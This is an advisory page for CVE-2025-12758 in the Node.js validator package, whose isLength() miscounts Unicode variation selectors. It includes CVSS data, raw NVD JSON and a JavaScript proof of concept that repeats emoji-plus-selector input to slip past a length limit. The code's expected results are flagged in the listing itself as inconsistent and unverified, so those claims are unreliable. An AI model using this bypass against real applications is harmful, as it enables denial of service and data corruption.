Security Vulnerability Report
CVE-2025-12758 CVSS 7.5 HIGH

CVE-2025-12758

Published: 2025-11-27 05:16:12
Last Modified: 2026-01-29 23:16:10

Description

Versions of the package validator before 13.15.22 are vulnerable to Incomplete Filtering of One or More Instances of Special Elements in the isLength() function, which does not account for Unicode variation selectors (\uFE0F, \uFE0E) appearing in a sequence and therefore miscalculates string length. As a result, an application that uses isLength for input validation can accept strings significantly longer than intended, resulting in issues like data truncation in databases, buffer overflows in other system components, or denial-of-service.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:validator_project:validator:*:*:*:*:*:node.js:*:* - VULNERABLE
validator.js < 13.15.22

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
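// Demonstration for CVE-2025-12758: how validator's isLength() measures strings
// that contain Unicode variation selectors (U+FE0E, U+FE0F).
// Per the advisory on this page, validator versions before 13.15.22 are affected.
//
// NOTE(review): the expected results in the trailing comments are the original
// listing's claims and were not re-run here. The single-sequence checks are
// listed as returning false for max: 1, while 100 repetitions of the same
// sequence are listed as passing max: 100; those two expectations appear
// inconsistent for a single library version. Run this against a pre-13.15.22
// install and a fixed one to confirm which output belongs to which.
const validator = require('validator');

// Baseline: one emoji with no variation selector.
// Written as an escape so the literal survives re-encoding of the page; the
// listing's raw literal was mis-encoded and no longer a single code point.
const normalEmoji = '\u{1F600}'; // U+1F600
const baselineOk = validator.isLength(normalEmoji, { min: 1, max: 1 });
console.log('Normal emoji length:', [...normalEmoji].length); // 1
console.log('isLength(normalEmoji, {min: 1, max: 1}):', baselineOk); // true

// Emoji followed by U+FE0F (variation selector-16, emoji presentation).
// Spreading a string iterates code points, so one visible glyph reports 2.
const emojiWithVS16 = '\u{1F600}\u{FE0F}';
const vs16Ok = validator.isLength(emojiWithVS16, { min: 1, max: 1 });
console.log('Emoji with VS16 length:', [...emojiWithVS16].length); // 2 code points
console.log('isLength(emojiWithVS16, {min: 1, max: 1}):', vs16Ok); // listed as false (incorrect)

// Emoji followed by U+FE0E (variation selector-15, text presentation).
const emojiWithVS15 = '\u{1F600}\u{FE0E}';
const vs15Ok = validator.isLength(emojiWithVS15, { min: 1, max: 1 });
console.log('Emoji with VS15 length:', [...emojiWithVS15].length); // 2 code points
console.log('isLength(emojiWithVS15, {min: 1, max: 1}):', vs15Ok); // listed as false (incorrect)

// Length-check case from the original listing: maxAllowed visible glyphs,
// each carrying a variation selector, checked against max: maxAllowed.
const maxAllowed = 100;
const maliciousInput = '\u{1F600}\u{FE0F}'.repeat(maxAllowed);
const passesCheck = validator.isLength(maliciousInput, { min: 0, max: maxAllowed });
console.log('Malicious input visual length:', maxAllowed);
console.log('Malicious input actual code points:', [...maliciousInput].length); // 200
console.log('isLength bypass check (max 100):', passesCheck); // listed as true (bypassed)

// What storage and downstream components actually receive. A validated
// "length" is not a size bound: columns, buffers and parsers are sized in
// code units or bytes, which is where the truncation and denial-of-service
// impacts named in the advisory come from.
console.log('UTF-16 code units:', maliciousInput.length);
console.log('UTF-8 bytes:', Buffer.byteLength(maliciousInput, 'utf8'));

// Mitigation: upgrade validator to 13.15.22 or later (per the advisory), and
// enforce an independent cap on raw size (str.length or Buffer.byteLength)
// before persisting or forwarding user input.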

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12758", "sourceIdentifier": "[email protected]", "published": "2025-11-27T05:16:12.193", "lastModified": "2026-01-29T23:16:09.843", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Versions of the package validator before 13.15.22 are vulnerable to Incomplete Filtering of One or More Instances of Special Elements in the isLength() function that does not take into account Unicode variation selectors (\\uFE0F, \\uFE0E) appearing in a sequence which lead to improper string length calculation. This can lead to an application using isLength for input validation accepting strings significantly longer than intended, resulting in issues like data truncation in databases, buffer overflows in other system components, or denial-of-service."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", 
"modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-792"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-172"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:validator_project:validator:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "13.15.22", "matchCriteriaId": "553CB501-5344-4AD6-84A3-2E69A53BC95D"}]}]}], "references": [{"url": "https://gist.github.com/koral--/ad31208b25b9e3d1e2e35f1d4d72572e", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/validatorjs/validator.js/pull/2616", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://security.snyk.io/vuln/SNYK-JS-VALIDATOR-13653476", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "http://seclists.org/fulldisclosure/2026/Jan/27", "source": "af854a3a-2127-422b-91ae-364da2661108"}, {"url": 
"https://security.snyk.io/vuln/SNYK-JS-VALIDATOR-13653476", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}